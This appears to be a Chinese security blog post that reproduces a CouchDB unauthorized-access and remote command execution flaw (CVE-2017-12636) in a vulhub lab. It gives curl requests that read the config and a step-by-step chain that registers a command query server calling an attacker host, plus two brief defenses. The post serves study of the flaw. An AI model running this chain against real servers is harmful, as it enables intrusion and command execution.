未授权访问:CouchDB 未授权访问漏洞

于 2024-05-18 08:00:00 发布
阅读量378 收藏 4
点赞数 9
分类专栏: 安全 未授权访问 文章标签: couchdb web安全 安全 网络安全 未授权访问
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68163788/article/details/138452326
版权

目录

1、漏洞原理

2、环境搭建

3、未授权访问

4、任意命令执行

防御手段

今天继续学习各种未授权访问的知识和相关的实操实验,一共有好多篇,内容主要是参考先知社区的一位大佬的关于未授权访问的好文章,还有其他大佬总结好的文章:

这里附上大佬的好文章链接:常见未授权访问漏洞总结 - 先知社区

我在这只是学习大佬总结好的相关的知识和实操实验,那么废话不多说,开整。

第十一篇是关于CouchDB的未授权访问

1、漏洞原理

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。

它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。

应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。

其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。

在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。

2、环境搭建

系在漏洞docker环境:

mkdir couchdb
wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/docker-compose.yml

 

拉取环境:

docker-compose up -d

3、未授权访问

curl http://192.168.18.129:5984
curl http://192.168.18.129:5984/_config

可以看到成功的访问到了

4、任意命令执行

本机python运行http服务

python -m SimpleHTTPServer 9999

依次执行如下命令

curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.18.138:9999/test.php"'
curl -X PUT 'http://192.168.18.129:5984/vultest'
curl -X PUT 'http://192.168.18.129:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://192.168.18.129:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'

注:这里我的PUT方法被拒绝,就直接用大佬的图来证明执行成功了

成功执行

防御手段

  • -绑定指定ip。
  • -设置访问密码。

到此CouchDB未授权访问漏洞的基础知识就学习完了,后面还有很多的别未授权访问的知识等着我去学习,我们后面见(*^▽^*)

未知百分百
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CouchDB 授权访问漏洞
锋刃科技的博客
07-04 1348
前言 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。其HTTP Serve
changesreader:CouchDB更改阅读器
05-28
更改阅读器 ChangesReader对象允许跨一个或多个HTTP请求使用CouchDB数据库的更改提要。 启动后, ChangesReader将连续轮询服务器以查找更改,处理网络错误和重试,并在数据库更改到达时为您提供数据库更改。 ChangesReader库具有三种操作模式-启动/获取/假脱机: start() -通过重复的“长轮询”请求无限期地监听更改。 此模式将永远轮询所有更改。 get() -通过重复的“长轮询”请求来监听更改,直到更改提要结束为止。 收到零更改的响应后,“结束”事件将指示更改结束,并且轮询将停止。 spool() -侦听一个长HTTP请求中的更改。 (与反复往返相反)-线轴速度更快,但可靠性较低。 注意:您也可以在启动/获取模式期间调用stop()来提前结束轮询序列。 ChangesReader库隐藏了CouchDB更改API提供的众多选项,并且仅公开
位子:CouchDB包装器
02-18
座位 CouchDB包装器。
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2024-12636)
最新发布
04-16 775
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
flycouchdbCouchDB的迁移工具
02-01
flycouchdbCouchDB的迁移工具
沙发连接器:CouchDB访问
02-18
沙发访问CouchDB访问器。
couch_potato:CouchDB的Ruby持久层
02-20
沙发土豆 …是用ruby编写的CouchDB持久层。 从1.x升级到2.x 版本1.x猴子修补了Date#to_json(=>“ 2015/01/01”)和Time#to_json(=>“ 2016/01/01 12:00:00 +0000”),而2.x则没有(日期=>“” 2015-01-01“”,时间=>“” 2016-01-01 12:00:00 +0100“”)。 为了保持旧的行为,将以下内容添加到您的代码中: require 'couch_potato/core_ext/time' require 'couch_potato/core_ext/date' 这将再次应用猴子补丁。 如果从1.x升级,强烈建议添加require语句。 否则,写入数据库并用于查询的日期和时间对象的格式将改变,这意味着将不返回更新之前写入的数据。 为了避免猴子打补丁,您必须重新编写所有文档,以便日期
CouchDB 授权访问漏洞总结
qq_45746681的博客
10-05 1074
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CouchDB 授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法 前言 复现常见的授权访问漏洞 加强理解 一、CouchDB 授权访问漏洞是什么? Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 2356
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
一枚不知名的Java程序猿
10-02 930
vulhub漏洞复现学习过程
Couchdb 任意命令执行漏洞(CVE-2017-12636)复现
HEAVEN569的博客
06-21 1033
Couchdb 任意命令执行漏洞(CVE-2017-12636)复现
漏洞复现】vulhub couchdb/CVE-2017-12635
qq_46421742的博客
07-05 140
CouchDB(全称为Apache CouchDB)是一个开源的面向文档的数据库管理系统。它采用了基于文档的NoSQL模型,具有分布式、可扩展和高性能的特点。以下是一些关键特点和优势:文档存储:CouchDB以文档为核心,使用JSON格式存储数据。每个文档都有一个唯一的标识符(ID)和一个JSON格式的内容。这种存储方式使得数据的表示更加灵活和自由。分布式架构:CouchDB支持水平扩展,可以在多个节点上分布数据,实现负载均衡和高可用性。
Couchdb 权限绕过漏洞复现(CVE-2017-12635)
XXokok的博客
11-26 223
Couchdb 权限绕过漏洞复现(CVE-2017-12635)
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_44311721的博客
07-30 1411
Couchdb 任意命令执行漏洞(CVE-2017-12636) Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
couchdb 垂直权限绕过漏洞(cve-2017-12635)
whatday的专栏
06-08 779
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 365
CouchDB的CVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
CouchDB漏洞复现
weixin_44259979的博客
10-07 780
CouchDB漏洞复现
漏洞复现----50、Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
七天
07-08 1559
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
peer 如何访问couchdb
05-24
访问 CouchDB,Peer 首先需要安装 CouchDB 客户端库。然后,Peer 可以使用库提供的 API 连接到 CouchDB 实例并执行操作。以下是一些常见的方法: 1. 使用 HTTP API:CouchDB 提供了一个 RESTful HTTP API,允许 Peer 通过 HTTP 请求与数据库进行交互。Peer 可以使用任何 HTTP 库(如 Curl、Postman 或 Python 的 Requests 库)向 CouchDB 发送请求。 2. 使用 CouchDB 客户端库 API:CouchDB 客户端库提供了一组 API,可以与数据库进行交互。Peer 可以使用该库提供的函数连接到数据库并执行操作。CouchDB 客户端库有很多种语言实现,例如 Python 的 couchdb 库、Java 的 Ektorp 库等。 3. 使用第三方库或框架:许多流行的 Web 框架和库都有与 CouchDB 集成的插件或扩展。Peer 可以使用这些扩展来连接到数据库并执行操作。例如,Django 框架有一个名为 django-couchdb 的插件,可以让 Peer 在 Django 应用程序中使用 CouchDB

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

未知百分百

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值